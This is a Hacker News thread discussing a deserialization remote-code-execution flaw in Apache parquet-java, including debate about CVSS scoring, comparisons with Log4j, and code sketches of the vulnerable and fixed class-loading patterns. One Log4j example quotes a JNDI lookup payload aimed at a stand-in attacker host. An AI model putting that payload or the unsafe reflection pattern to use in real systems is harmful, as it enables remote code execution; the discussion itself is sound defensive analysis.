tptacek 2 days ago

Broken record, but "has a CVSS score of 10.0" is literally meaningless. In fact, over the last couple years, I've come to take vulnerabilities with very high CVSS scores less seriously. Remember, Heartbleed was a "7.5".

  • pclmulqdq 2 days ago

    I am pretty convinced that CVSS has a very significant component of "how enterprise is it." Accepting untrusted parquet files without verification or exposing Apache Spark directly to users is a very "enterprise" thing to do (alongside having Log4j log untrusted user inputs). Heartbleed sounded too technical and not "enterprise" enough.

    • positr0n 2 days ago

      > alongside having log4j log untrusted user inputs

      I'd think logging things like query parameters is extremely common.

  • marcolussetti 2 days ago

    That's mostly due to the switch from CVSS 2 to CVSS 3.

  • tgv 2 days ago

    It may be noisy, but recently Draytek routers had a 10-point one, and indeed, an office router had been taken over. It would stubbornly reboot every couple of minutes and not accept upgrades.

  • junon 2 days ago

    Yep. Any software these days can be "network accessible" if you put a server in front of it; that's usually what pumps the score up.

  • b8 2 days ago

    Someone should make a new scoring system that gives a better signal.

    • tptacek 2 days ago

      I think the original one did just fine: "info, low, medium, high, crit".

      I could even do without "crit".

      • worthless-trash 2 days ago

        I believe companies often call that the flaw's impact.

        It is different from the CVSS rating.

        • tptacek 2 days ago

          In that it is meaningful, yes.

          • worthless-trash 2 days ago

            Surely you think AV:P (attack vector: physical) has a meaningful description in the CVSS score?

    • saagarjha 2 days ago

      It's quite hard to do this.

jtchang 2 days ago

It's so dumb to assign it a CVSS score of 10.

Unless you are blindly accepting parquet-formatted files, this really doesn't seem that bad.

A vulnerability in parsing images, xml, json, html, css would be way more detrimental.

I can't think of many services that accept parquet files directly. And those that do are usually called via a backend service.

  • jeroenhd 2 days ago

    Unless you're logging user input without proper validation, log4j doesn't really seem that bad.

    As a library, this is a huge problem. If you're a user of the library, you'll have to decide if your usage of it is problematic or not.

    Either way, the safe solution is to just update the library. Or, based on the link shared elsewhere (https://github.com/apache/parquet-java/compare/apache-parque...) maybe avoid this library if you can, because the Java-specific code paths seem sketchy as hell to me.
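
    If you depend on parquet-java (e.g. via parquet-avro) directly and build with Maven, the bump is one line; 1.15.1 is the first patched release:

      <dependency>
        <groupId>org.apache.parquet</groupId>
        <artifactId>parquet-avro</artifactId>
        <version>1.15.1</version> <!-- first release with the fix -->
      </dependency>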

    • seanhunter 2 days ago

      It’s incredibly common to log things that contain text elements from a user request. I’ve worked on systems that do that hundreds of thousands of times per day. I’ve literally never deserialized a parquet file that came from someone else, not even once, and I’ve used parquet since it was first released.

    • ajross 2 days ago

      > Unless you're logging user input without proper validation, log4j doesn't really seem that bad.

      Most systems do log user input though, and "proper validation" is an infamously squishy phrase that mostly acts as an excuse. The bottom line is that the natural/correct/idiomatic use of Log4j exposed the library directly to user-generated data. The similar use of Apache parquet (an obscure tool many of us are learning about for the first time) does not. That doesn't make it secure, but it makes the impact inarguably lower.
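
      To make that concrete, a sketch (hypothetical handler class; the lookup behavior is CVE-2021-44228, patched in Log4j 2.15.0):

        import javax.servlet.http.HttpServletRequest;
        import org.apache.logging.log4j.LogManager;
        import org.apache.logging.log4j.Logger;

        // Perfectly idiomatic Log4j 2.x usage: log a request header.
        // On vulnerable versions (< 2.15.0), a header value such as
        //   ${jndi:ldap://attacker.example/x}
        // was evaluated as a lookup at log time, fetching and running
        // attacker-supplied code.
        class RequestHandler {
            private static final Logger log = LogManager.getLogger(RequestHandler.class);

            void handle(HttpServletRequest request) {
                log.info("request User-Agent: {}", request.getHeader("User-Agent"));
            }
        }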

      I mean, come on: the Log4j exploit was a global zero-day!

      • jeroenhd 2 days ago

        > Most systems do log user input though, and "proper validation" is an infamously squishy phrase that mostly acts as an excuse

        That's my point: if you start adding constraints to a vulnerability to reduce its scope, no vulnerability ever gets a high score.

        Any vulnerability that can be characterised as "pass contents through parser, full RCE" is a 10/10 vulnerability for me. I'd rather find out my application isn't vulnerable after my vulnerability scanner reports a critical issue than let it lurk with all the other 3/10 vulnerabilities about potential NULL pointers or complexity attacks in specific method calls.

        • ajross 2 days ago

          > Any vulnerability that can be characterised as "pass contents through parser, full RCE" is a 10/10 vulnerability for me

          And I think that's just wildly wrong, sorry. I view something that has been exploited in the wild to compromise real systems as higher impact than something that hasn't, and I want to see a "score" value that reflects that (IMHO critical) distinction. Agree to disagree, as it were.

  • SpicyLemonZest 2 days ago

    The score is meant for consumption by users of the software with the vulnerability. In the kind of systems where Parquet is used, blindly reading files in a context with more privileges than the user who wrote them is very common. (Think less "service accepting a parquet file from an API", more "ETL process that can read the whole company's data scanning files from a dump directory anyone can write to".)

    • seanhunter 2 days ago

      I get the point you’re making but I’m gonna push back a little on this (as someone who has written a fair few ETL processes in their time). When are you ever ETLing a parquet file? You are always ETLing some raw format (csv, json, raw text, structured text, etc.) and writing into parquet files, never reading parquet files themselves.

      It seems like pretty bad practice to write your ETL to just pick up whatever file in whatever format from a slop bucket you don’t control. I would always pull files in specific formats from such a common staging area, and everything else would go into a random “unstructured data” dump where you just make a copy of it and record the metadata. I mean, it’s a bad bug and I’m happy they’re fixing it, but it feels like you have to go out of your way to encounter it in practice.

  • bigfatkitten 2 days ago

    Vendor CVSS scores are always inherently meaningless because they can't take into account the factors specific to the user's environment.

    Users need to do their own assessments.

    • worthless-trash 2 days ago

      This comment over-generalises the problem and is inherently absurd: there are key indicators in the scoring that describe the attack itself, which isn't environment-specific.

      I do agree that in most cases the deployment-specific configuration affects exploitability, and that users or developers should analyse their own configuration.

formerly_proven 3 days ago

As per the PoC, yes — this is the usual Java Deserialization RCE where it’ll instantiate arbitrary classes. Java serialization really is a gift that keeps on giving.
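
The dangerous shape, as a sketch (the generic anti-pattern, not the actual parquet-java code):

  // A class name read from attacker-controlled input goes straight into
  // reflection: Class.forName runs the class's static initializers, and
  // newInstance runs a constructor, both chosen by the attacker.
  static Object instantiateFromUntrustedName(String untrustedClassName) throws Exception {
      Class<?> clazz = Class.forName(untrustedClassName);
      return clazz.getDeclaredConstructor().newInstance();
  }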

  • stefan_ 3 days ago

    I love how these always instantly escalate into trivial code execution / reverse shell. Remember kids, C is the enemy!

    The "fix" in question also screams "delete this crap immediately": https://github.com/wgtmac/parquet-mr/commit/d185f867c1eb968a...

    • hinkley 3 days ago

      The fix still loads the class before checking if it’s okay.

      That’s a smaller attack window but it’s still not zero.

      • josefx 2 days ago

        Java reflection can load classes without initializing them, so no untrusted code would have to be executed at that point.

        • hinkley 2 days ago

          I haven’t been in Java for a good while. When did they add that?

          Static initializers used to run on ClassLoader calls.

          • josefx 2 days ago

            An overload of Class.forName with an explicit initialize parameter was added in Java 1.2.
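
            Something like this (a sketch; the allowlist check is illustrative, not the actual fix):

              // With initialize = false, the class is loaded and linked but its
              // static initializers do NOT run, so resolving an untrusted name
              // before the check executes no attacker code.
              static Class<?> resolveChecked(String name, java.util.Set<String> allowlist)
                      throws ClassNotFoundException {
                  Class<?> c = Class.forName(name, false,
                          Thread.currentThread().getContextClassLoader());
                  if (!allowlist.contains(c.getName())) {
                      throw new SecurityException("class not allowed: " + name);
                  }
                  return c; // static init stays deferred until first real use
              }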

            • hinkley 2 days ago

              Except they don't call Class.forName(..., false, ...) anywhere in the codebase, so my original comment still stands.

    • pclmulqdq 3 days ago

      This is a bug in Java, a language considered "memory safe" because of its GC and its VM. This is not a memory safety bug.

      • chowells 2 days ago

        It's true. No memory is being used in contravention of the language semantics. Absolutely memory safe.

g-mork 3 days ago

When did vulnerability reports get so vague? Looks like a classic serialization bug:

https://github.com/apache/parquet-java/compare/apache-parque...

  • amluto 3 days ago

    Better link: https://github.com/apache/parquet-java/pull/3169

    If by “classic” you mean “using a language-dependent deserialization mechanism that is wildly unsafe”, I suppose. The surprising part is that Parquet is a fairly modern format with a real schema that is nominally language-independent. How on Earth did Java class names end up in the file format? Why is the parser willing to parse them at all? At most (at least by default), the parser should treat them as predefined strings that have semantics completely independent of any actual Java class.

    • bri3d 2 days ago

      This seems to come from parquet-avro, which appears to embed Avro in Parquet files and, in the course of doing so, does silly Java reflection gymnastics. I don’t think “normal” parquet is affected.

      • tikhonj 2 days ago

        Last time I tried to use the official Apache Parquet Java library, parsing "normal" Parquet files depended on parquet-avro because the library used Avro's GenericRecord class to represent rows from Parquet files with arbitrary schemas. So this problem would presumably affect any kind of Parquet parsing, even if there is absolutely no Avro actually involved.

        (Yes, this doesn't make sense; the official Parquet Java library had some of the worst code design I've had the misfortune to depend on.)
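
        For reference, that read path looks roughly like this (a sketch; the file name and column are hypothetical):

          import org.apache.avro.generic.GenericRecord;
          import org.apache.hadoop.fs.Path;
          import org.apache.parquet.avro.AvroParquetReader;
          import org.apache.parquet.hadoop.ParquetReader;

          // A plain Parquet file in, Avro GenericRecords out: no Avro-encoded
          // data is involved; the Avro classes are just the in-memory rows.
          try (ParquetReader<GenericRecord> reader =
                  AvroParquetReader.<GenericRecord>builder(new Path("data.parquet")).build()) {
              GenericRecord row;
              while ((row = reader.read()) != null) {
                  System.out.println(row.get("some_column"));
              }
          }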

        • twoodfin 2 days ago

          Indeed, given the massive interest Parquet has generated over the past 5 years, and its critical role in modern data infrastructure, I’ve been disappointed every time I’ve dug into the open source ecosystem around it for one reason or another.

          I think it’s revealing and unfortunate that everyone serious about Parquet, from DuckDB to Databricks, has written their own “codec”.

          Some recent frustrations on this front from the DuckDB folks:

          https://duckdb.org/2025/01/22/parquet-encodings.html

          • dev_l1x_be 2 days ago

            Unfortunately, many of the big data libraries are like that, and there is no motivation to fix these things. One example is the ORC Java libraries, which had hundreds of unnecessary dependencies while at the same time importing the filesystem into the format itself.

        • jeeeb 2 days ago

          The Apache Arrow libraries are a good alternative for reading parquet files in Java. They provide a column oriented interface, rather than the ugly Avro stuff in the Apache Parquet library.

      • amluto 2 days ago

        The documentation for all of this is atrocious.

        But if avro-in-parquet is a weird optional feature, it should be off by default! Parquet’s metadata is primarily in Thrift, not Avro, and it seems to me that no Avro should be involved in decoding Parquet files unless explicitly requested.

        • bri3d 2 days ago

          To the sibling comment’s point, I suppose it’s not weird in the Java ecosystem. The parquet-java project has a design where it deserializes Parquet fields into Java representations grabbed from _other_ projects, rather than either having some kind of canonical self-representation in memory or acting as just an abstract codec. So, one of the most common things to do is apparently to use the “Avro”-flavored serdes to get generic records in memory (note that the actual Avro serialization format is not involved; parquet-java just uses the classes from Avro as the in-memory representations and deserializes Parquet into them).

          The whole approach seems a bit goofy; I’d expect the library to work as some kind of abstracted codec interface (requiring the in-memory representations to host Parquet, rather than the other way around, like how pandas hosts fastparquet in Python land) or to provide a canonical object representation. Instead, it’s this in-between with a grab bag of converters that transform Parquet to and from random object types pulled from elsewhere in the Java ecosystem.

          • amluto 2 days ago

            I’d still like to see a clear explanation of where one can stick a Java class name in a Parquet file such that it ends up interpreted by the Avro codec. And I’m curious why it was fixed by making a list of allowed class names instead of disabling the entire mechanism.

  • hypeatei 2 days ago

    Tangential, but there was a recent sandbox escape vulnerability in both Chrome and Firefox.

    The bug threads are still private, almost two weeks after the issues were disclosed and fixed. Very strange.

    https://bugzilla.mozilla.org/show_bug.cgi?id=1956398

    https://issues.chromium.org/issues/405143032

    https://www.cve.org/CVERecord?id=CVE-2025-2783

3eb7988a1663 3 days ago

Maybe the headline should note that this is a parser vulnerability, not one in the format itself. I suppose that is obvious, but my first knee-jerk thought was, "Am I going to have to re-encode XXX piles of data?"

  • necubi 2 days ago

    Also that it's in the Java parquet library, which somehow is mentioned nowhere in the article.

  • brokensegue 2 days ago

    What would it mean for the vulnerability to be in the format and not the parser?

    • 3eb7988a1663 2 days ago

      I don't know. Something like a Python pickle file where parsing is unavoidable.

      On a second read, I realized a format problem was unlikely, but the headline just said "Apache Parquet". My mind might have reached the same conclusion if it had said "safetensors" or "PNG".

    • jonstewart 2 days ago

      It would mean that data encoded in a certain way leads to unavoidable exploitation in every conforming implementation. For example, PDF permits embedded JavaScript and… that has not gone well.

    • dist-epoch 2 days ago

      Macros in old Microsoft Word documents were quite a popular attack.

nikanj 3 days ago

"Maximum severity RCE" no longer means "unauthenticated RCE by any actor", it now means "the vulnerability can only be exploited if a malicious file is imported"

Grumbling about CVE inflation

  • marcusb 3 days ago

    CVSS, at least in its current form, needs to be taken out back and shot. See, for instance, https://daniel.haxx.se/blog/2025/01/23/cvss-is-dead-to-us/

    • buu700 2 days ago

      I like the idea of CVSS, but it's definitely less precise than I'd like as-is. E.g., I've found that most issues I would normally think of as low-severity get bumped up to medium by CVSS just for having a network-based attack vector, even if the actual issue is extremely edge-case, extremely complex and/or computationally expensive to exploit, or not clearly exploitable at all.

  • kevincox 2 days ago

    But Parquet is intended to be a safe format. So importing a malicious file should still be safe.

    Like if a browser had a vulnerability parsing HTML, of course it would be a major concern, because browsers very often parse HTML from untrusted parties.

    • mr_mitm 2 days ago

      Why is "user interaction: none" though? There should be reasoning attached to the CVSS vector in these CVEs.

      • StressedDev 2 days ago

        Probably because there are services (i.e. web services, software listening on a network port, etc.) out there that accept arbitrary Parquet files. This seems like a safe assumption given that lots of organizations use micro-services, and cloud vendors use the same software on the same machines to process requests from different customers. This is a bad bug, and if you use the affected code, you should update immediately.

  • tptacek 2 days ago

    There's no such thing as CVE inflation because CVEs don't have scores. You're grumbling about CVSS inflation. But: CVSS has always been flawed, and never should have been taken seriously.

    • sean_flanigan 2 days ago

      Those CVE numbers go up every year… Sounds like inflation to me! ;-)

lpapez 2 days ago

Soon to be announced: "Quake PAK files identified carrying malware, critical 10/10 vulnerability"

marginalia_nu a day ago

I migrated off Apache Parquet to a very simple columnar format. That cut processing times in half, reduced RAM usage by almost 90%, and (as it turns out) dodged this security vulnerability.

I don't want to be too harsh on the project, as it may simply not have been the right tool for my use case, but it sure gave me a lot of issues.

ustad 3 days ago

Does anyone know if pandas is affected? I serialize/deserialize dataframes, and pandas uses parquet under the hood.

  • minimaxir 3 days ago

    Pandas doesn't use the parquet Python package under the hood: https://pandas.pydata.org/docs/reference/api/pandas.read_par...

    > Parquet library to use. If ‘auto’, then the option io.parquet.engine is used. The default io.parquet.engine behavior is to try ‘pyarrow’, falling back to ‘fastparquet’ if ‘pyarrow’ is unavailable.

    Those should be unaffected.

    • westurner 3 days ago

      Python pickles have the same issue, but there it's a design decision per the docs.

      Python docs > library > pickle: https://docs.python.org/3/library/pickle.html

      Re: a hypothetical pickle protocol that doesn't eval code at parse time ("skipcode pickle protocol 6"), see "AI Supply Chain Attack: How Malicious Pickle Files Backdoor Models" and "Insecurity and Python Pickles": https://news.ycombinator.com/item?id=43426963

      • echoangle 2 days ago

        But python pickle is only supposed to be used with trusted input, so it’s not a vulnerability.

  • natebc 3 days ago

    https://www.endorlabs.com/learn/critical-rce-vulnerability-i...

    > Any application or service using Apache Parquet Java library versions 1.15.0 or earlier is believed to be vulnerable (our own data indicates that this was introduced in version 1.8.0; however, current guidance is to review all historical versions). This includes systems that read or import Parquet files using popular big-data frameworks (e.g. Hadoop, Spark, Flink) or custom applications that incorporate the Parquet Java code. If you are unsure whether your software stack uses Parquet, check with your vendors or developers – many data analytics and storage solutions include this library.

    Seems safe to assume yes, pandas is probably affected by using this library.

    • nindalf 3 days ago

      The paragraph you pasted in states that only applications importing the Java library are vulnerable.

      Isn’t pandas implemented in Python/C? How would it have been importing the Java library?

      • natebc 2 days ago

        I'm sorry. I made a mistake.

    • 3eb7988a1663 3 days ago

      That does not follow for me. Pandas does not utilize Java/JVM.

      • natebc 2 days ago

        I'm sorry. I made a mistake.

yencabulator 16 hours ago

In parquet-java, the *Java implementation of Apache Parquet*.

Not in the file format.

rini17 2 days ago

Never roll your own deserialization :)

  • junon 2 days ago

    That's not the takeaway here.